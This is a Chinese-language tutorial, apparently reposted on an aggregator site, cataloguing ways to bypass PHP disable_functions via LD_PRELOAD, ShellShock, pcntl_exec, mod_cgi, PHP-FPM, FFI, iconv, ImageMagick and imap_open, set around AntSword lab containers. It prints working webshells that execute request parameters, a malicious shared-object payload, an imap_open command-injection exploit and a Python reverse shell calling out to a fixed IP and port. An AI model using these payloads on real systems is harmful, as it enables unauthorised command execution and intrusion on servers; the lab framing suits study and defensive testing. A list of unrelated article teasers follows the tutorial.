突破PHP disable_functions方法

1. 利用 LD_PRELOAD 环境变量

知识扫盲

  • LD_PRELOAD:是Linux系统的一个环境变量,它指定的*.so文件会在程序本身的*.so文件之前被加载。
  • putenv():PHP函数,可以设置环境变量
  • mail(),error_log():PHP函数,在运行时会执行系统中的程序:sendmail

思路:构造一个带命令执行的eval.os文件,让其被LD_PRELOAD加载;然后在PHP中调用mail函数或error_log函数,函数内部会执行系统的sendmail命令,sendmail会调用其他的一些系统函数;这样我们构造的eval.os就会加载并覆盖sendmail本应调用的库函数,达到命令执行的效果。

  1. 首先写eval.c:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

__attribute__ ((__constructor__)) void hausa_zui_shuai(void)
{
    unsetenv("LD_PRELOAD");
    system("echo any_other_eval_code");
    system("/readflag > /tmp/hausa.txt");
}

__attribute__ ((__constructor__))这个参数,它使得被自己修饰的函数在main函数前执行。

  1. 然后gcc -shared -fPIC eval.c -o eval.so将这个源文件编译成动态链接库文件,并将其上传到服务器的/tmp目录下。

  1. 网站根目录上传shell.php
<?Php
putenv("LD_PRELOAD=/tmp/eval.so");
mail("", "", "", "");
error_log("",1,"","");
?>

然后url 访问shell.php。在访问过程中,putenv()函数将我们写好的恶意动态链接库文件赋值给LD_PRELOAD环境变量,然后在调用mail()和error_log的时候,Linux会执行系统程序sendmail,但是在执行sendmail的main函数之前,会先执行我们设计好的用了__attribute__ ((__constructor__))参数修饰的恶意函数,从而导致了命令的执行。

最后在/tmp目录下,即可看到hausa.txt文件

参考:Bypass disable_function —— LD_PRELOAD-CSDN博客

利用条件

  • Linux 操作系统
  • putenv
  • mail or error_log 本例中禁用了 mail 但未禁用 error_log
  • 存在可写的目录, 需要上传 .so 文件

参考:bypass_disable_functions/1

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/1
docker-compose up -d

搜索disable_functions,查看禁用函数

上传webshell后执行命令无任何显示

利用方法

加载插件

选择模式

其他默认,然后直接点击开始

运行成功后会生成两个文件

直接使用蚁剑连接.antproxy.php那个文件,密码还是原来的密码。即可执行命令了

可发现在目标机器上用 PHP 启动了一个 http server, 并且加载的是 PHP 默认配置。

2. 利用 ShellShock (CVE-2014-6271)

CVE-2014-6271,通常被称为Shellshock漏洞。影响到了许多Unix和Linux操作系统。该漏洞的影响主要集中在Bash(Bourne Again Shell)这个常用的命令行解释器上。

Shellshock漏洞的根本原因是在Bash的环境变量处理中存在一个安全漏洞,允许攻击者在环境变量中注入恶意代码,然后在系统上执行任意命令。

利用条件

  • Linux 操作系统
  • putenv
  • mail or error_log 本例中禁用了 mail 但未禁用 error_log
  • /bin/bash 存在 CVE-2014-6271 漏洞
  • /bin/sh -> /bin/bash sh 默认的 shell 是 bash

利用方法

cd AntSword-Labs/bypass_disable_functions/2
docker-compose up -d

AntSword 默认虚拟终端中已经集成了对 ShellShock 的利用,直接在打开的虚拟终端中即可执行命令

手动利用

<?php
  function runcmd($c){
  $d = dirname($_SERVER["SCRIPT_FILENAME"]);
if(substr($d, 0, 1) == "/" && function_exists('putenv') && (function_exists('error_log') || function_exists('mail'))){
  if(strstr(readlink("/bin/sh"), "bash")!=FALSE){
    $tmp=tempnam(sys_get_temp_dir(), 'as');
    putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
    if (function_exists('error_log')) {
      error_log("a", 1);
    }else{
      mail("a@127.0.0.1", "", "", "-bv");
    }
  }else{
    print("Not vuln (not bash)\n");
  }
  $output = @file_get_contents($tmp);
  @unlink($tmp);
  if($output!=""){
    print($output);
  }else{
    print("No output, or not vuln.");
  }
}else{
  print("不满足使用条件");
}
}

// runcmd("whoami"); // 要执行的命令
runcmd($_REQUEST["cmd"]); // ?cmd=whoami
?>

3. 利用pcntl_exec

pcntl是linux下的一个扩展,可以支持php的多线程操作。很多时候会碰到禁用exec等函数的情况,但如果运维人员安全意识不强或对PHP不甚了解,则很有可能忽略pcntl扩展的相关函数。

pcntl_exec()是pcntl插件专有的命令执行函数来执行系统命令函数,可以在当前进程空间执行指定的程序。

利用条件

  • PHP安装并启用了pcntl插件

可以通过phpinfo查看是否启用,如下如果出现 pcntl support enable则说明启用

或者如下访问test.php输出1则说明启用了pcntl_exec

<?php
if(function_exists('pcntl_exec')) {
   echo 1;
} else {
       echo 'pcntl extension is not support!';
}
?>

反弹shell

由于pcntl_exec()执行命令是没有回显的,所以其常与python结合来反弹shell。注意这里路径“/usr/bin/python3"可能不相同。访问test.php

<?php pcntl_exec("/usr/bin/python3",array('-c','import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,socket.SOL_TCP);s.connect(("192.168.31.66",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'));

反弹shell成功,可以正常执行命令

4. 利用 Apache Mod CGI

  1. CGI(Common Gateway Interface)是一种标准,允许 web 服务器调用外部程序来处理客户端的请求。通过 CGI,Web 服务器可以调用外部程序来处理特定的请求,这些程序负责生成动态的内容或执行其他服务器端任务关于CGI:
  2. mod_cgi: mod_cgi 是 Apache HTTP 服务器的一个模块,它实现了 CGI 标准,使得 Apache 能够处理和执行 CGI 脚本。这个模块允许 Apache 接收到 CGI 请求时,调用外部的 CGI 可执行文件或脚本,并将请求数据传递给这些程序。mod_cgi 会处理与 CGI 相关的环境变量和数据传递,以确保与外部程序的正确通信。

因此,mod_cgi 是 Apache 服务器上的一个模块,用于支持和处理 CGI 请求。当你在 Apache 中启用 CGI 支持时,mod_cgi 就会参与处理这些请求,将它们转发给外部程序(CGI 脚本或可执行文件)并将结果返回给客户端。

参考:https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/3

利用条件

  • Linux 操作系统,unix不可以如SunOS
  • Apache + PHP
  • Apache 开启了 cgi、rewrite
  • Web 目录给了 AllowOverride 权限。AllowOverride 是 Apache 配置中的一个指令,用于确定是否允许在.htaccess文件中覆盖服务器配置。这个指令可以在 Apache 配置文件(通常是httpd.conf)中设置,也可以在虚拟主机配置中设置。
  • 当前目录可写

我们利用 AntSword-Labs 项目来搭建环境:

git clone https://github.com/AntSwordProject/AntSword-Labs.git
cd AntSword-Labs/bypass_disable_functions/3
docker-compose up -d

启动后蚁剑连接,发现无法执行命令

查看apache否启用了 CGI 模块

  1. 通过phpinfo查看

  1. 查看 Apache 配置文件

通过查看apache的配置文件,通常为 /etc/httpd/httpd.conf、/etc/apache2/apache2.conf 或类似的文件。打开搜索如下

LoadModule cgi_module modules/mod_cgi.so

如果这一行存在,说明 mod_cgi 模块已经加载,即 CGI 支持已启用。

利用方法

使用「绕过 disable_functions」插件, 选择 Apache_mod_cgi 模式进行。注意:刚点进来的时候, 左侧状态栏处都是 NO

点击「开始」按钮后,成功之后, 会创建一个新的「虚拟终端」

手动利用

创建.htaccess 和shell.ant文件,需要在其Linux环境下创建因为编码问题。

首先在当前目录创建 .htaccess 文件,写入如下。该.htaccess文件的内容指示了在该目录下启用了 CGI 执行,并将文件扩展名为.ant的文件定义为 CGI 脚本。

Options +ExecCGI
AddHandler cgi-script .ant

然后新建 shell.ant 文件,写入要执行的命令。再加上执行权限

#!/bin/sh
echo Content-type: text/html
echo ""
echo&&id

最后访问shell.ant文件便可成功执行命令

5. 通过攻击 PHP-FPM

PHP-FPM(FastCGI Process Manager)是一个用于管理 FastCGI 进程的工具,专门为 PHP 脚本设计。FastCGI 是一种常见的通信协议,允许 Web 服务器(如 Nginx 或 Apache)与外部进程(如 PHP 解释器)之间进行更高效的通信。PHP-FPM 提供了一个进程管理器,负责处理 PHP 请求,提高性能和可扩展性。

具体来说,PHP-FPM 的主要功能包括:

  1. 进程管理: PHP-FPM 可以启动、停止和管理 PHP 进程。这使得它可以动态地调整处理 PHP 请求的进程数量,以适应服务器负载的变化。
  2. 性能提升: PHP-FPM 通过保持一组 PHP 进程在内存中并重用它们,减少了每个请求的启动时间。这有助于提高 PHP 脚本的执行速度和整体性能。
  3. 资源隔离: PHP-FPM 可以为每个 PHP 进程设置独立的资源限制,包括内存和执行时间。这有助于防止某个请求消耗过多资源影响整个服务器性能。
  4. 日志记录: PHP-FPM 生成日志,记录 PHP 进程的活动,包括错误信息和性能统计。这有助于管理员监控系统并进行故障排除。

总的来说,PHP-FPM 提供了一种有效管理 PHP 进程的方式,从而提高了 PHP 脚本在 Web 服务器上的性能和可靠性。

利用条件

  • Linux 操作系统
  • 开启了PHP-FPM服务(不会默认开启,需要安装、配置再开启)
  • 存在可写的目录, 需要上传 .so 文件

查找 PHP-FPM 接口地址

PHP-FPM(FastCGI Process Manager)通常监听一个本地套接字或网络端口,以便与 Web 服务器进行通信。接口地址(socket 地址或 IP 地址+端口)在 PHP-FPM 配置文件中指定。

  1. 查看 PHP-FPM 配置文件,如下发现端口为9000

利用方法

cd AntSword-Labs/bypass_disable_functions/5
docker-compose up -d

查看phpinfo,发现目标主机配置了FPM/Fastcgi

选择PHP-FPM的接口地址后,点击开始

成功后可以看到 /var/www/html/ 目录下新建了一个 .antproxy.php 文件。连接该文件后即可执行命令

6. 利用 Json Serializer UAF

UAF漏洞(Use-After-Free)是一种内存破坏漏洞,漏洞成因是一块堆内存被释放了之后又被使用。漏洞利用了 json 在序列化中的堆溢出触发 bypass

利用条件

  • Linux 操作系统
  • PHP 版本需满足:
    • 7.1 - all versions to date
    • 7.2 < 7.2.19 (released: 30 May 2019)
    • 7.3 < 7.3.6 (released: 30 May 2019)

UAF 一次可能不成功,需要多次尝试。

利用方法

cd AntSword-Labs/bypass_disable_functions/6
docker-compose up -d

查看php版本为7.2.18

选择 Json Serializer UAF 模式进行

7. 利用 GC UAF

漏洞利用的是 php garbage collector(垃圾收集器)程序中的堆溢出达成 bypass

利用条件

  • Linux 操作系统
  • PHP 版本
    • 7.0 - all versions to date
    • 7.1 - all versions to date
    • 7.2 - all versions to date
    • 7.3 - all versions to date

利用方法

cd AntSword-Labs/bypass_disable_functions/7
docker-compose up -d

查看php版本为7.2.18

选择 Json Serializer UAF 模式进行

8. 利用 FFI 扩展

PHP 7.4 的 FFI(Foreign Function Interface),即外部函数接口,允许用户在PHP代码中去调用C代码。

首先我们使用 FFI::cdef() 函数在PHP中声明一个我们要调用的这个C库中的函数以及使用到的数据类型,类似如下:

$ffi = FFI::cdef("int system(char* command);");   # 声明C语言中的system函数

这将返回一个新创建的FFI对象,然后使用以下方法即可调用这个对象中所声明的函数:

$ffi ->system("ls / > /tmp/res.txt");   # 执行ls /命令并将结果写入/tmp/res.txt

利用条件

  • Linux 操作系统
  • PHP >= 7.4
  • 开启了 FFI 扩展且 ffi.enable=On
cd AntSword-Labs/bypass_disable_functions/8
docker-compose up -d

php版本大于等于7.4

FFI扩展开启,所以可以尝试利用此方法

利用方法

选择 PHP74_FFI 模式进行

9. 利用iconv

利用条件

  • Linux 操作系统
  • putenv
  • iconv启用。PHP 中用于进行字符集转换的函数
  • 存在可写的目录, 需要上传 .so 文件
cd AntSword-Labs/bypass_disable_functions/9
docker-compose up -d

iconv函数 是 PHP 标准库的一部分,通常是默认启用的。也有可能被禁用

发现icon启用了

利用原理

PHP在执行iconv()函数时实际调用了glibc中一些和iconv相关的函数,其中一个叫iconv_open()的函数会根据GCONV_PATH环境变量找到系统的gconv-modules文件,再根据gconv-modules文件找到对应的.so文件进行链接。然后会调用.so文件中的gconv()和gonv_init()函数。如果我们能修改GCONV_PATH环境变量指向我们编写的gconv-modules文件,则可以使得PHP加载我们上传的恶意的动态链接库,然后绕过禁用函数执行命令。

需要在/tmp目录下上传一个gconv-modules文件,在其中写入如下内容:

module  自定义字符集名(大写)//    INTERNAL    ../../../../../../../../tmp/自定义字符集名(小写)    2
module  INTERNAL    自定义字符集名(大写)//    ../../../../../../../../tmp/自定义字符集名(小写)    2

在iconv.c中写入下面的C代码

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("whoami > /tmp/result");
}

生成动态链接库payload.so:

gcc -shared -fPIC iconv.cpp -o 自定义字符集名.so

执行PHP代码:

<?php
    putenv("GCONV_PATH=/tmp/");
    iconv("自定义字符集名", "UTF-8", "whatever");
?>

然后可以在/tmp/result下看到命令执行的结果

利用方法

使用iconv插件bypass

成功后连接/.antproxy.php即可执行命令

也不仅仅是iconv函数,还有其他的编码转换的方式也能触发iconv_open()函数,例如在蚁剑的插件源码里就有4种通过iconv绕过禁用函数的方式

if(function_exists('iconv')){
  iconv("payload","UTF-8","whatever");
}else if(function_exists('iconv_strlen')){
  iconv_strlen("1","payload");
}else if(function_exists('file_get_contents')){
  @file_get_contents("php://filter/convert.iconv.payload.UTF-8/resource=data://text/plain;base64,MQ==");
}else{
  @fopen('php://filter/convert.iconv.payload.UTF-8/resource=data://text/plain;base64,MQ==','r');
};

10. 利用ImageMagick 漏洞绕过(CVE-2016–3714)

imagemagick是一个用于处理图片的程序,它可以读取、转换、写入多种格式的图片。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线,多边形,椭圆,曲线,附加到图片伸展旋转。

利用ImageMagick绕过disable_functions的方法利用的是ImageMagick的一个漏洞(CVE-2016-3714)。漏洞的利用过程非常简单,只要将精心构造的图片上传至使用漏洞版本的ImageMagick,ImageMagick会自动对其格式进行转换,转换过程中就会执行攻击者插入在图片中的命令。因此很多具有头像上传、图片转换、图片编辑等具备图片上传功能的网站都可能会中招。所以如果在phpinfo中看到有这个ImageMagick,可以尝试一下。

利用条件

  • 目标主机安装并开启了ImageMagick拓展(版本需<= 3.3.0)
  • 安装了php-imagick拓展并在php.ini中启用;
  • PHP >= 5.4

利用方法

使用网上已有的docker镜像来搭建环境:

docker pull medicean/vulapps:i_imagemagick_1
docker run -d -p 8000:80 --name=i_imagemagick_1 medicean/vulapps:i_imagemagick_1

访问phpinfo.php,发现开启了imagemagick服务。并且版本为3.3.0

参考:bypass disable_functions姿势总结 - 先知社区、bypass disable_functions姿势总结 - 先知社区

11. 利用imap_open()绕过

利用条件需要安装iamp扩展,命令行输入:apt-get install php-imap

在php.ini中开启imap.enable_insecure_rsh选项为On;重启服务。

PHP 的imap_open函数中的漏洞可能允许经过身份验证的远程攻击者在目标系统上执行任意命令。该漏洞的存在是因为受影响的软件的imap_open函数在将邮箱名称传递给rsh或ssh命令之前不正确地过滤邮箱名称。如果启用了rsh和ssh功能并且rsh命令是ssh命令的符号链接,则攻击者可以通过向目标系统发送包含-oProxyCommand参数的恶意IMAP服务器名称来利用此漏洞。成功的攻击可能允许攻击者绕过其他禁用的exec 受影响软件中的功能,攻击者可利用这些功能在目标系统上执行任意shell命令。

exp:

<?php 
error_reporting(0); 
if (!function_exists('imap_open')) { 
die("no imap_open function!"); 
} 
$server = "x -oProxyCommand=echot" . base64_encode($_GET['cmd'] .
">/tmp/cmd_result") . "|base64t-d|sh}"; 
//$server = 'x -oProxyCommand=echo$IFS$()' . base64_encode($_GET['cmd'] .
">/tmp/cmd_result") . '|base64$IFS$()-d|sh}'; 
imap_open('{' . $server . ':143/imap}INBOX', '', ''); // or
var_dump("nnError: ".imap_last_error()); 
sleep(5); 
echo file_get_contents("/tmp/cmd_result"); 
?>

12. 利用 SplDoublyLinkedList UAC

PHP的SplDoublyLinkedList双向链表库中存在一个用后释放漏洞,该漏洞将允许攻击者通过运行PHP代码来转义disable_functions限制函数。在该漏洞的帮助下,远程攻击者将能够实现PHP沙箱逃逸,并执行任意代码。更准确地来说,成功利用该漏洞后,攻击者将能够绕过PHP的某些限制,例如disable_functions和safe_mode等等。

参考:奇安信攻防社区-常见 Bypass Disable Functions 的方法总结

参考:

  • https://www.cnblogs.com/one-seven/p/15194350.html
  • PHP禁用函数绕过 | e4stjun's blog
  • https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/277158.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

ERROR: No matching distribution found for torch==2.0.1解决方案

大家好&#xff0c;我是水滴~~ 本文主要介绍在安装 stable-diffusion-webui 时出现的 ERROR: No matching distribution found for torch2.0.1 问题的解决方案&#xff0c;希望能对你有所帮助。 《Python入门核心技术》专栏总目录・点这里 文章目录 问题描述解决方案离线安装 …

基于ssm潍坊理工学院就业信息网的设计与实现论文

摘 要 现代经济快节奏发展以及不断完善升级的信息化技术&#xff0c;让传统数据信息的管理升级为软件存储&#xff0c;归纳&#xff0c;集中处理数据信息的管理方式。本潍坊理工学院就业信息网就是在这样的大环境下诞生&#xff0c;其可以帮助管理者在短时间内处理完毕庞大的数…

VSCode安装Go环境

VSCode安装Go 1.点击Go官网&#xff0c;根据自己环境下载go安装包&#xff0c;我这里为Windows 2.双击安装包&#xff0c;一直点击【Next】即可 VSCode配置Go基础环境 1.创建Go的工作目录: C:\Code\GoCode 2.创建Go的环境变量: GOPATH (1)右键【此电脑】&#xff0c;点击…

什么是骨传导耳机?骨传导能保护听力吗?

骨传导耳机是一种非常特殊的蓝牙耳机&#xff0c;它通过骨传导技术将声音直接传送到内耳。这种技术不同于传统耳机&#xff0c;它不通过空气传送声音&#xff0c;而是通过头骨的振动来传送声音。 并且骨传导耳机能够在一定程度上起到保护听力的作用&#xff0c;主要是因为它们不…

春款来啦~我先冲了

这款假两件设计的连帽风衣外套 宽松版型对身材包容性很强&#xff0c;韩系慵懒风颜色很舒服 时尚百搭怎么穿都好看系列 做了腰部可调节抽绳&#xff0c;想要修身一点的可以自己调节哈 袖口处也做了金属按扣调节&#xff0c;防风保暖 这件风衣也很好搭配&#xff0c;很经典…

PICKIT3下载器脱机烧写指导书

一&#xff0c; PICKIT3的联机烧写方法 PICKIT3的联机烧写与ICD2一致&#xff0c;只是需要在MPLAB IDEV840或者更高版本下使用PICKIT3。烧写时&#xff0c;从MPLAB IDE的菜单“PROGRAMMER——PICKIT3”&#xff0c;选中PICKIT3即可。 由于PICKIT3能提供的烧写电流比较小&#…

微软CEO纳德拉当选2023年度CEO,AI大模型崛起成重要趋势;Mixtral 8x7B 真的击败了 GPT 3.5 Turbo 吗?

&#x1f989; AI新闻 &#x1f680; 微软CEO纳德拉当选2023年度CEO&#xff0c;AI大模型崛起成重要趋势 摘要&#xff1a;2023年被认为是AI大模型崛起之年&#xff0c;微软CEO纳德拉凭借对AI的投资和领导力当选2023年度CEO。纳德拉将AI技术融入微软的产品和服务中&#xff0…

gin框架使用系列之四——json和protobuf的渲染

系列目录 《gin框架使用系列之一——快速启动和url分组》《gin框架使用系列之二——uri占位符和占位符变量的获取》《gin框架使用系列之三——获取表单数据》 上篇我们介绍了如何获取数据&#xff0c;本篇我们介绍一下如何返回固定格式的数据。 一、返回JSON数据 在web开发中…

Vue监听浏览器自带的复制事件并对复制内容进行修改

场景&#xff1a; 在使用鼠标右键或者ctrl c的时候。光标会自动换行。粘贴出来的数据光标应该在红色部分&#xff0c;却出现在了黑色部分。 方法一&#xff1a; html标签不要换行&#xff1b;css去除空格&#xff1b; white-space: nowrap;方法二&#xff1a; 使用函数对复…

请问仿写arkts摇杆功能,为什么我的代码,TouchType.Up 时候摇杆动画不能还原呢?请求大佬指点一下

仿照黑马的arkts 写个摇杆功能&#xff0c;但是为什么我的代码&#xff0c;TouchType.Up 时候摇杆动画不能还原&#xff0c; 请求大佬指点一下 import router from ohos.router import curves from ohos.curvesEntry Component struct ItemPage7 {// 小鱼坐标State fishX: nu…

vue data变量不能以“_”开头,否则会产生很多怪异问题

1、 比如给子组件赋值&#xff0c;子组件无法得到这个值&#xff08;也不是一直无法得到&#xff0c;设置后this.$forceUpdate() 居然可以得到&#xff09;&#xff0c; 更无法watch到 <zizujian :config"_config1"> </zizujian>this._config1 { ...…

XCTF-MISC1 文件内容遮挡

pdf 题目描述 题目分析 附件下载下来&#xff0c;是一张图片的pdf文件 调整图片透明度发现flag flag{security_through_obscurity}

Qt编写的exe程序上添加程序信息

1、qtcreator编写 在pro文件中添加如下信息 # 版本信息 VERSION 4.0.2.666# 图标 RC_ICONS Images/MyApp.ico# 公司名称 QMAKE_TARGET_COMPANY "Digia"# 产品名称 QMAKE_TARGET_PRODUCT "Qt Creator"# 文件说明 QMAKE_TARGET_DESCRIPTION "Qt …

基于Java网上点餐系统设计与实现

博主介绍&#xff1a; ✌至今服务客户已经1000、专注于Java技术领域、项目定制、技术答疑、开发工具、毕业项目实战 ✌ &#x1f345; 文末获取源码联系 &#x1f345; &#x1f447;&#x1f3fb; 精彩专栏 推荐订阅 &#x1f447;&#x1f3fb; 不然下次找不到 Java项目精品实…

工业4G 物联网网关——机房动环监控系统应用方案介绍

机房动环监控系统是什么&#xff1f;机房动环监控系统的全称为机房动力环境监控系统&#xff0c;是一套安装在机房内的监控系统&#xff0c;可以对分散在机房各处的独立动力设备、环境和安防进行实时监测&#xff0c;统计和分析处理相关数据&#xff0c;第一时间侦测到故障发生…

实时获取小红书笔记详情的API使用与解析

一、背景介绍 小红书是一个以分享消费经验、生活方式为主的社交平台&#xff0c;拥有大量的用户和内容。为了更好地了解用户在小红书上的行为和内容&#xff0c;许多开发者选择使用小红书开放平台提供的API接口。本文将介绍如何通过小红书笔记详情API实现实时数据获取&#xf…

Openslide安装

文章目录 安装open-slide python下载openslide二进制文件解压到Anaconda的library目录下配置环境变量在py文件中添加以下语句即可 官网链接 安装open-slide python 表面上这样就可以导入了但事实上会遇到 Couldn’t locate OpendSlide DLL的问题&#xff0c;openslide必须独立安…

svg学习

概念 svg 可缩放矢量图形 svg 使用xml格式定义图像 svg 形状 矩形 <rect> <?xml version"1.0" standalone"no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd&q…

conda环境下Could not build wheels for dlib解决方法

1 问题描述 在安装模型运行的conda环境时&#xff0c;出现如下问题&#xff1a; Building wheels for collected packages: basicsr, face-alignment, dlib, ffmpy, filterpy, futureBuilding wheel for basicsr (setup.py) ... doneCreated wheel for basicsr: filenamebasi…

mysql树查询和时间段查询

本文目录 文章目录 案例1&#xff1a;MySQL树形结构查询案例2&#xff1a;MySQL查询一段时间内的所有日期 摘要 案例1&#xff1a;MySQL树形结构查询 在页面开发过程中&#xff0c;如图一所示的树形控件很常见&#xff0c;而大多数情况下&#xff0c;树形控件中需要显示的数据…
最新文章